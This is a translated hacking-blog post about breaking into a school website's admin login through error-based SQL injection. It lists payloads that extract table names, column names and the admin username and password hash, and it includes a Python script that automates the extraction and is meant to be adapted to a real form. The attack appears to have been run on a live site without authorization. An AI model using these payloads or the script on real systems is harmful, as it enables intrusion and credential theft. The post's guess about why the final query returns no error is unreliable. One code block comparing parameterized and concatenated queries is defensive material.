Post injection in the login box

Source: Internet
Author: User

One day I set out to do a thorough test of a certain school's site, and this post is the result.
 
First, as usual, submit some data at a few input points to get a feel for the site's overall security. Pick an ASP display page and append a single quotation mark to a parameter. The expected result appears (figure 1, image not preserved).
Some expert has put protection in place. Nice. Does that mean injection is impossible? Hard to say.
 
There was an injection point on the front end, but when I tested it the anti-injection filter was still in the way. Seeing protection this aggressive, I was a bit intimidated, but I was not afraid to go looking for the back end: adding admin to the URL in the address bar was enough to find it (figure 2, image not preserved).
 
No password. What now? Try the universal password 'or'='or'.
 
Result (figure 3, image not preserved):

Do all the universal passwords fail here?
 
If they do not work, look at the response:

Incorrect syntax near the keyword 'or'.

This means our input reaches the query unfiltered. So I decided to submit queries through the username field to pull out the admin users, as follows.
 
Submit the following as the username:

1' and '1'='1

It returns a normal page (image not preserved).

Now submit a bare 1' and it returns an error page (image not preserved).

(The MD5 string shown there is the random password I typed, hashed.) Comparing the two results shows that the injection exists: the first input keeps the SQL well-formed, the second breaks the quoting. No further explanation needed.
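The two-request check above, as an added example that is not the site's ASP code: a login query built by string concatenation (the pattern the post exploits) beside the same check with bound parameters. An in-memory SQLite database stands in for the school's MSSQL back end, and the account row is constructed, so the script runs offline. The universal-password bypass shown here uses ' or 1=1 or ' rather than the 'or'='or' string the post tried, because on SQL Server that exact string is a syntax error, which is what the post observed.

```python
"""Login check with string-concatenated SQL beside the parameterized
form. Added example, not the site's ASP code; an in-memory SQLite
database stands in for the school's MSSQL back end and the account
data is constructed."""
import hashlib
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE XD_Manager (M_name TEXT, M_password TEXT)")
    # Constructed credential: the site stores MD5 hashes, so do the same.
    con.execute("INSERT INTO XD_Manager VALUES (?, ?)",
                ("admin", hashlib.md5(b"constructed-password").hexdigest()))
    return con


def login_vulnerable(con, username, password):
    """The pattern the post exploits: the username is pasted into the
    SQL text. Returns ('ok', name), ('denied', None) or ('error', msg)."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT M_name FROM XD_Manager WHERE M_name='" + username
           + "' AND M_password='" + pw_hash + "'")
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", row[0]) if row else ("denied", None)


def login_safe(con, username, password):
    """Same check with bound parameters: the username is data, never SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT M_name FROM XD_Manager WHERE M_name=? AND M_password=?"
    row = con.execute(sql, (username, pw_hash)).fetchone()
    return ("ok", row[0]) if row else ("denied", None)


def looks_injectable(login, con):
    """The post's two-request test: a username that keeps the SQL
    well-formed must behave normally, and a lone quote must break it."""
    balanced = login(con, "1' and '1'='1", "anything")
    broken = login(con, "1'", "anything")
    return balanced[0] != "error" and broken[0] == "error"


if __name__ == "__main__":
    db = make_db()
    print(looks_injectable(login_vulnerable, db))            # True
    print(looks_injectable(login_safe, db))                  # False
    print(login_vulnerable(db, "' or 1=1 or '", "wrong"))    # ('ok', 'admin')
    print(login_safe(db, "' or 1=1 or '", "wrong"))          # ('denied', None)
```

The point of looks_injectable is that the difference between the two requests is a structural one (well-formed SQL versus a syntax error), so it survives even when the error page is generic; with bound parameters both inputs are just usernames that do not exist and the test returns False.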
 
Now let's start pulling out data. The idea is to use ordinary queries and make the database leak what we want through its own error messages.
 
Enter as the username:

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U')) and '1'='1

The leading 1' closes the application's own string literal, and the trailing and '1'='1 keeps the statement complete by absorbing the closing quote the application appends.

The part in the middle forces the subquery result (a table name) to int. A table name cannot be converted, so the database raises a conversion error, and the error message quotes the value it failed to convert.
 
Result (image not preserved):

The first table name came out: JYS_Js, the top 1 row of the user tables in sysobjects.
 
Let's continue with the second table. Type:

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('jys_js'))) and '1'='1

What does this mean? Compared with the previous statement, the extra and name not in (...) is our constraint: the table name may not be jys_js, so the first row returned is really the second table in the database.
 



Enter the following statement to get the third table:

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('jys_js','dtproperties'))) and '1'='1

This also excludes dtproperties, a table SQL Server creates for database diagrams rather than part of the application.
 



 
The rest follows the same pattern and is not explained.

Finally, I type the statement:

1' and 1=convert(int,(select top 1 name from sysobjects where xtype='U' and name not in ('jys_js','dtproperties','jys_column','jys_District','jys_file','jys_jyz','jys_News','xd_Chushi','xd_city','xd_Column','xd_District','xd_file','xd_FriendLink','xd_huodong','xd_Manager','xd_new','xd_Province','xd_user','xd_User_Column','xl_group','xl_systemconfig'))) and '1'='1
 
Result (image not preserved):

This shows that every table has been excluded and the subquery returns nothing, that is, NULL. I take NULL to be 0, and 0 is an int that compares with 1 without raising an error, so the statement simply does not error. (That is my understanding; I am not sure it is correct, and would welcome an expert's explanation.)
 
So I locked on to the table XD_Manager and went after its columns.

There is a claim on the Internet that

select * from XD_Manager having 1=1

exposes all the columns at once, but for a novice like me it did not; it seems to return only one column per error. (The aggregate error names one column at a time; adding the column it named to a group by clause makes the next error name the following column.)
 
Quick and decisive, then.

Enter the statement:

1' and 1=convert(int,(select top 1 col_name(object_id('xd_manager'),1) from XD_Manager)) and '1'='1

Nothing more to say; it is easy to follow. The first column name is displayed in the returned error (image not preserved).
 

 
Continue with the next column. Type:

1' and 1=convert(int,(select top 1 col_name(object_id('xd_manager'),2) from XD_Manager)) and '1'='1

The result returned:

Syntax error converting the nvarchar value 'M_name' to a column of data type int.
 
Eventually all the columns came out. Now for the data.

Type:

1' and 1=convert(int,(select top 1 M_name from XD_Manager)) and '1'='1

This returns the first user name (image not preserved).

As expected, it is admin. Next, the password.
 
Type:

1' and 1=convert(int,(select top 1 M_password from XD_Manager)) and '1'='1

The MD5 hash comes back (image not preserved). Crack it and you are done.
 
Of course we can repeat the earlier trick. What is the second user name?

1' and 1=convert(int,(select top 1 M_name from XD_Manager where M_name not in ('admin'))) and '1'='1

Submitting that gives the second user name. Nothing more to say; not explained or shown here.
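The table, column and row loops above, automated as an added example (not the post's own tooling). Every step is the same move: send a payload, look for the conversion error, take the value it quotes, and add it to the not in (...) list or bump the col_name index. The only part that touches a target is the send callable; here fake_send is a constructed stand-in that evaluates the injected subquery against a small made-up schema, so the script runs offline. Two details the post leaves implicit are encoded here: the regex accepts both the SQL Server 2000 wording of the error (what the post saw) and the later "Conversion failed ..." wording, and the loops stop on the first response without an error, which is what happens once the subquery returns NULL, since convert(int, NULL) is NULL and 1 = NULL is neither true nor an error.

```python
"""Error-based enumeration through the login form, automating the
manual steps in the post. Added example, not the post's own tooling.
The only network-facing piece is the `send` callable: it takes the
username string and returns the response body. `fake_send` below
simulates the MSSQL back end with a constructed in-memory schema."""
import re

# SQL Server 2000 wording (what the post saw) and SQL Server 2005+ wording.
LEAK_RE = re.compile(
    r"Syntax error converting the n?varchar value '([^']*)' to a column of data type int"
    r"|Conversion failed when converting the n?varchar value '([^']*)' to data type int")


def leaked_value(response):
    """Return the string the conversion error quoted, or None if the
    response carried no such error."""
    m = LEAK_RE.search(response)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def not_in(values):
    return ",".join("'%s'" % v for v in values)


def table_payload(known):
    sub = "select top 1 name from sysobjects where xtype='U'"
    if known:
        sub += " and name not in (%s)" % not_in(known)
    return "1' and 1=convert(int,(%s)) and '1'='1" % sub


def column_payload(table, index):
    # col_name() returns NULL past the last column, so the loop ends on no error.
    return ("1' and 1=convert(int,(select top 1 col_name(object_id('%s'),%d) from %s)) and '1'='1"
            % (table, index, table))


def row_payload(table, column, known):
    sub = "select top 1 %s from %s" % (column, table)
    if known:
        sub += " where %s not in (%s)" % (column, not_in(known))
    return "1' and 1=convert(int,(%s)) and '1'='1" % sub


def enumerate_tables(send):
    found = []
    while True:
        v = leaked_value(send(table_payload(found)))
        if v is None or v in found:      # NULL result, or a target that ignores not in
            return found
        found.append(v)


def enumerate_columns(send, table):
    cols = []
    while True:
        v = leaked_value(send(column_payload(table, len(cols) + 1)))
        if v is None:
            return cols
        cols.append(v)


def enumerate_rows(send, table, column):
    vals = []
    while True:
        v = leaked_value(send(row_payload(table, column, vals)))
        if v is None or v in vals:
            return vals
        vals.append(v)


# --- constructed simulation of the target; the names and rows are made up ---
FAKE_SCHEMA = {
    "jys_js": (["js_id"], []),
    "dtproperties": (["id"], []),
    "XD_Manager": (["M_id", "M_name", "M_password"],
                   [("1", "admin", "constructed-md5-hash"),
                    ("2", "editor", "another-constructed-hash")]),
}
ERR = "Syntax error converting the nvarchar value '%s' to a column of data type int."
NORMAL = "Wrong username or password."


def fake_send(username):
    """Pretend MSSQL: evaluate the injected subquery against FAKE_SCHEMA."""
    ex = re.search(r"not in \((.*?)\)", username)
    excluded = set(re.findall(r"'([^']*)'", ex.group(1))) if ex else set()
    if "from sysobjects" in username:
        for t in FAKE_SCHEMA:
            if t not in excluded:
                return ERR % t
        return NORMAL
    m = re.search(r"col_name\(object_id\('(\w+)'\),(\d+)\)", username)
    if m:
        cols = FAKE_SCHEMA[m.group(1)][0]
        i = int(m.group(2))
        return ERR % cols[i - 1] if i <= len(cols) else NORMAL
    m = re.search(r"select top 1 (\w+) from (\w+)", username)
    if m:
        cols, rows = FAKE_SCHEMA[m.group(2)]
        idx = cols.index(m.group(1))
        for r in rows:
            if r[idx] not in excluded:
                return ERR % r[idx]
        return NORMAL
    return NORMAL


if __name__ == "__main__":
    print(enumerate_tables(fake_send))                       # ['jys_js', 'dtproperties', 'XD_Manager']
    print(enumerate_columns(fake_send, "XD_Manager"))        # ['M_id', 'M_name', 'M_password']
    print(enumerate_rows(fake_send, "XD_Manager", "M_name")) # ['admin', 'editor']
```

To run this against a real form, replace fake_send with a function that POSTs the string as the username and returns the response body. One caveat: a value that is itself a valid integer (an id column, say) converts without error and the loop stops early; concatenating a letter in front of the column inside the subquery is the usual way to force the error for such columns.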
 
However, when I tried to log in I ran into a problem (images not preserved).

I really do not understand this. I suspect the administrator has noticed. I would ask an expert to explain it. Wait for the next article.
 
A few related posts:

www.2cto.com/Article/201111/110526.html
www.2cto.com/Article/200809/29429.html
 
